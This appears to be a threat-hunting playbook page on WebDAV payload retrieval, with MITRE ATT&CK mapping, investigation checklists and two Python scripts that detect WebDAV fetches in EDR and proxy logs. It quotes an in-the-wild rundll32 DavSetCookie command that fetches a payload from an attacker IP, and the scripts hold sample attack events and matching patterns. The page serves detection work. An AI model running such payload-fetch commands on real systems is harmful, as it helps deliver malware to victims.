WebDAV payload retrieval


Attack technique

Technique name: WebDAV Payload Retrieval

MITRE ATT&CK

  • Tactic: Command and Control, Resource Development
  • Technique: Application Layer Protocol: Web Protocols, Stage Capabilities: Upload Malware

Technique description
WebDAV is an extension of HTTP that allows user agents to collaboratively author content directly on an HTTP web server, so that the Web can be used as a writeable, collaborative medium rather than a read-only one. A notable advantage of this protocol for threat actors is that connection requests to a WebDAV server are initiated by svchost.exe (hosting the WebClient service), which breaks the expected process chain and makes the activity harder to spot. The protocol has been associated with various malicious campaigns, and threat actors use it to transfer their payloads and tools into compromised environments.

Insights from threat intelligence
The use of WebDAV servers has become a malware distribution trend. The method is popular because it helps attackers blend into legitimate HTTP traffic, and the request is less likely to be blocked because it is initiated by svchost.exe rather than by the attacker's own payload. We’ve seen an increase in attacks where WebDAV-hosted payloads are fetched and executed either with user interaction or programmatically.

In-the-wild example:
rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie 172[.]86.68.194@80 http://172[.]86.68.194/4496

References

Threat hunting theses breakdown

WebDAV payload retrieval followed by process execution

Relevant Data Sources

  • EDR Logs

Thesis explanation
A WebDAV-hosted payload is fetched through the WebDAV protocol and subsequently executed. The execution can occur either when a user is tricked into clicking on the payload or programmatically as part of a prior stage of the attack. The thesis focuses on WebDAV servers that are rarely accessed by the organization.

Blind spots

  • Cases where the payload was not executed, or executed more than 5 minutes after its retrieval
  • Cases where a frequently contacted domain or IP is being compromised and used to host WebDAV payloads.

Recommended investigation flow

  1. Investigate the target WebDAV server:

     Domain:

     • Is it in Umbrella 1M?
     • Is it a baby domain (registered recently)?
     • Which registrar registered it?
     • Does it have a valid certificate?
     • Does the whois information reveal the organization that owns the domain?
     • When was it first accessed by the organization?
     • How frequently is it accessed by the organization?

     IP:

     • Which ASN does it belong to?
     • Is it a hosting provider's IP?
     • Is it a proxy IP?
     • When was it first accessed by the organization?
     • How frequently is it accessed by the organization?

  2. Investigate the payload execution:

     • What kind of file is it (binary, script, document, etc.)?
     • How was it executed (as a standalone process, or run by another process)?
     • What operations were initiated by the process (process and file creations, network connections)?
     • Is the hash known in VT or seen in public sandbox reports?
     • Was a file with the same extension written to the default WebDAV cache directory?
       • Path: \Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
       • In case of a malicious payload retrieval, the payload can be extracted from this path for further analysis and should then be removed from the machine.
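The thesis above (a DavSetCookie retrieval followed within 5 minutes by execution of a file from the Tfs_DAV cache or from a UNC path to the same server, restricted to rarely contacted servers) can be expressed as a small correlation over process-creation events. The following is an added example written for this page, not one of the page's own hunting queries. It assumes a simplified EDR event shape (`ts`, `image`, `cmdline`, `parent`) and a baseline dictionary of how often each WebDAV host was contacted historically; the events, hosts (198.51.100.7, 203.0.113.9, sharepoint.corp.example) and baseline counts are constructed sample data, and real EDR schemas differ.

```python
"""Correlate WebDAV payload retrieval with a following process execution (added example)."""
import re
from datetime import datetime, timedelta

# Default WebDAV client cache directory named in the investigation flow.
TFS_DAV_CACHE = r"\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV"
WINDOW = timedelta(minutes=5)  # thesis scope: execution within 5 minutes of retrieval

# Matches the DavSetCookie invocation seen in the in-the-wild example:
#   rundll32.exe ...\davclnt.dll,DavSetCookie <host>@<port> <url>
DAVSETCOOKIE_RE = re.compile(
    r"davclnt\.dll,DavSetCookie\s+(?P<host>[^@\s]+)@(?P<port>\d+)\s+(?P<url>\S+)",
    re.IGNORECASE,
)

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")

def retrieval_host(event):
    """Return the WebDAV host contacted by a rundll32 DavSetCookie event, else None."""
    if not event["image"].lower().endswith("rundll32.exe"):
        return None
    m = DAVSETCOOKIE_RE.search(event["cmdline"])
    return m.group("host").lower() if m else None

def executed_from_webdav(event, host):
    """True if the new process image sits in the DAV cache or on a UNC path to host.

    The cache directory is shared by all WebDAV servers, so a cache-path match is
    accepted for any retrieval inside the time window; a UNC match is host-specific.
    """
    image = event["image"].lower()
    return (TFS_DAV_CACHE.lower() in image
            or image.startswith("\\\\" + host + "@")
            or image.startswith("\\\\" + host + "\\"))

def correlate(events, baseline_counts, rare_threshold=3):
    """Return (retrieval, execution) pairs for rarely contacted WebDAV hosts."""
    events = sorted(events, key=lambda e: parse_ts(e["ts"]))
    hits = []
    for i, ret in enumerate(events):
        host = retrieval_host(ret)
        if host is None:
            continue
        if baseline_counts.get(host, 0) > rare_threshold:
            continue  # frequently contacted server: out of thesis scope (a known blind spot)
        t0 = parse_ts(ret["ts"])
        for ex in events[i + 1:]:
            if parse_ts(ex["ts"]) - t0 > WINDOW:
                break  # later executions fall into the >5 minute blind spot
            if executed_from_webdav(ex, host):
                hits.append((ret, ex))
    return hits

# Constructed sample events (hypothetical hosts and paths, not real indicators).
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:00", "image": r"C:\Windows\System32\rundll32.exe", "parent": "svchost.exe",
     "cmdline": r"rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie 198.51.100.7@80 http://198.51.100.7/payload"},
    {"ts": "2024-05-01T10:01:30", "parent": "explorer.exe", "cmdline": "payload.exe",
     "image": r"C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\payload.exe"},
    # Retrieval from a frequently used internal server: present in the baseline, so not flagged.
    {"ts": "2024-05-01T10:05:00", "image": r"C:\Windows\System32\rundll32.exe", "parent": "svchost.exe",
     "cmdline": r"rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie sharepoint.corp.example@443 https://sharepoint.corp.example/docs"},
    {"ts": "2024-05-01T10:06:00", "image": r"\\sharepoint.corp.example@443\docs\report.exe",
     "cmdline": "report.exe", "parent": "explorer.exe"},
    # Execution 10 minutes after retrieval: outside the window, so not flagged.
    {"ts": "2024-05-01T11:00:00", "image": r"C:\Windows\System32\rundll32.exe", "parent": "svchost.exe",
     "cmdline": r"rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie 203.0.113.9@80 http://203.0.113.9/late"},
    {"ts": "2024-05-01T11:10:00", "parent": "explorer.exe", "cmdline": "late.exe",
     "image": r"C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\late.exe"},
]
BASELINE_COUNTS = {"sharepoint.corp.example": 5000}  # constructed 30-day access counts

if __name__ == "__main__":
    for ret, ex in correlate(SAMPLE_EVENTS, BASELINE_COUNTS):
        print(f"{ret['ts']} retrieval from {retrieval_host(ret)} -> {ex['ts']} executed {ex['image']}")
```

The two skipped cases in the sample data are exactly the blind spots listed above: a well-known server filtered out by the baseline, and an execution that lands outside the 5 minute window. Tuning `rare_threshold` against the organization's own baseline is what decides how much of the first blind spot remains.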

WebDAV payload retrieval

Relevant data sources

  • Proxy Logs

Thesis explanation
A WebDAV-hosted payload is fetched through an HTTP GET request using the WebDAV protocol, identified by the default WebDAV user agent. This request can be initiated either when a user is tricked into clicking on a WebDAV-hosted payload, or programmatically as part of a prior stage of the attack.

Blind spots
Cases where the default WebDAV user agent is not used. This is unlikely, since the request is initiated by the WebClient service, which makes its parameters hard to modify.

Recommended investigation flow
Investigate the target WebDAV server:

Domain:

  • Is it in Umbrella 1M?
  • Is it a baby domain (registered recently)?
  • Which registrar registered it?
  • Does it have a valid certificate?
  • Does the whois information reveal the organization that owns the domain?
  • When was it first accessed by the organization?
  • How frequently is it accessed by the organization?

IP:

  • Which ASN does it belong to?
  • Is it a hosting provider's IP?
  • Is it a proxy IP?
  • When was it first accessed by the organization?
  • How frequently is it accessed by the organization?
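The proxy-log thesis keys on two things: the request method (GET) and the user agent the Windows WebClient service sends, which starts with `Microsoft-WebDAV-MiniRedir/` followed by the OS build. The following is an added example for this page, not one of its hunting queries. It assumes a constructed space-separated proxy log format (`timestamp src_ip method url status "user-agent"`) and uses a historical baseline of per-host request counts to implement the "rarely accessed by the organization" criterion; the hosts and log lines are sample data, not real indicators.

```python
"""Hunt proxy logs for WebDAV GET requests to rarely contacted servers (added example)."""
import re
from collections import Counter
from urllib.parse import urlsplit

# User agent sent by the Windows WebClient service (WebDAV Mini-Redirector).
WEBDAV_UA_PREFIX = "Microsoft-WebDAV-MiniRedir/"

# Constructed log format: ts src method url status "user-agent"
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+'
    r'(?P<status>\d{3})\s+"(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one proxy log line into a dict, adding the destination host; None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["host"] = (urlsplit(rec["url"]).hostname or "").lower()
    return rec

def is_webdav_get(rec):
    """The thesis looks at the GET that fetches the payload, sent with the default WebDAV UA."""
    return rec["method"] == "GET" and rec["ua"].startswith(WEBDAV_UA_PREFIX)

def build_baseline(baseline_lines):
    """Count requests per destination host over the historical baseline period."""
    counts = Counter()
    for line in baseline_lines:
        rec = parse_line(line)
        if rec:
            counts[rec["host"]] += 1
    return counts

def hunt(log_lines, baseline_lines, rare_threshold=5):
    """Return WebDAV GET records whose destination host is rare in the baseline."""
    baseline = build_baseline(baseline_lines)
    hits = []
    for line in log_lines:
        rec = parse_line(line)
        if rec and is_webdav_get(rec) and baseline[rec["host"]] <= rare_threshold:
            hits.append(rec)
    return hits

# Constructed baseline: a month of routine WebDAV traffic to an internal document server.
BASELINE_LOG = [
    f'2024-04-{d:02d}T09:00:00 10.0.0.{d} GET https://sharepoint.corp.example/docs/f{d}.docx 200 '
    f'"{WEBDAV_UA_PREFIX}10.0.19041"'
    for d in range(1, 31)
]

# Constructed hunt window. Line 1 is the PROPFIND the client issues before fetching;
# line 2 is the GET the thesis targets; line 3 goes to a well-known server; line 4 is a
# browser fetch of the same rare host and is deliberately not matched (different UA).
HUNT_LOG = [
    '2024-05-01T10:00:00 10.0.0.23 PROPFIND http://198.51.100.7/4496 207 "Microsoft-WebDAV-MiniRedir/10.0.19041"',
    '2024-05-01T10:00:01 10.0.0.23 GET http://198.51.100.7/4496 200 "Microsoft-WebDAV-MiniRedir/10.0.19041"',
    '2024-05-01T10:02:00 10.0.0.41 GET https://sharepoint.corp.example/docs/f3.docx 200 "Microsoft-WebDAV-MiniRedir/10.0.19041"',
    '2024-05-01T10:03:00 10.0.0.55 GET http://198.51.100.7/index.html 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]

if __name__ == "__main__":
    for rec in hunt(HUNT_LOG, BASELINE_LOG):
        print(f"{rec['ts']} {rec['src']} fetched {rec['url']} via WebDAV (rare host {rec['host']})")
```

Filtering on the user agent is what makes this thesis cheap to run, and it is also the blind spot stated above: a request that does not carry the WebClient user agent, such as the browser line in the sample, is not a WebDAV fetch from this thesis' point of view even when it reaches the same rare host.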

Hunting queries

EDR:

Proxy logs: